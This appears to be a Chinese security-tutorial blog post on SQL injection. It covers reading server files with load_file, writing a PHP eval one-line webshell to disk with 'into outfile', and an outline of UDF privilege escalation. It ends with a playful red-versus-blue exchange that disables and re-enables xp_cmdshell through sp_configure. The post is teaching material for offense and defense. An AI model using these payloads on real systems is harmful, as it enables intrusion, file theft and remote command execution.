SQL注入漏洞~下(web漏洞解析与攻防实战)

信息安全不简单鸭 2024-07-11 19:26:19

书接上文,继续学习SQL注入的攻击思路,这篇文章记录的是sql注入读取文件,sql注入写入文件,以及udf提权,以及xp_cmdshell的红蓝对抗故事,这个故事我的同学和我吃饭的时候也说过,我才认识到原来护网除了实战演练里面的打打杀杀,还有另一种形式,那就是文绉绉的红蓝辩论赛~

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

sql注入查询数据库:ailx10:SQL注入漏洞~上(web漏洞解析与攻防实战)sql注入读取文件:select load_file('/tmp/1.txt');

sql查询磁盘文件

sql注入写入文件:select "<?php eval($_POST['x'])?>" into outfile "/tmp/3.txt";

sql向磁盘写php一句话木马

UDF提权(了解一下即可)

UDF用户自定义函数,用户可以通过自定义函数实现在mysql中创建一些功能,知道sql注入也能提权就够了。大致思路如下:

把含有自定义函数的so/dll文件放入特定位置在mysql中引用这个so/dll文件中的自定义函数使用这个自定义函数执行系统调用xp_cmdshell(了解一下)

xp_cmdshell 允许在sqlserver中直接调用系统命令,接下来请欣赏红蓝护网辩论赛:

蓝队:我关闭xp_cmdshell

exec master.sys.sp_configure 'xp_cmdshell',0;

红队:我开启xp_cmdshell

exec master.sys.sp_configure 'xp_cmdshell',1;

蓝队:我用高级配置,禁止你开启xp_cmdshell

exec master.sys.sp_configure 'xp_cmdshell',0;exec master.sys.sp_configure 'show advanced options',0;

红队:我也用高级配置,重新开启xp_cmdshell

exec master.sys.sp_configure 'show advanced options',1;exec master.sys.sp_configure 'xp_cmdshell',1;

蓝队:我删除xp_cmdshell 相关的dll文件

红队:我上传xp_cmdshell 相关的dll文件

裁判:果然道高一尺魔高一丈,红队获胜~~~

0 阅读:38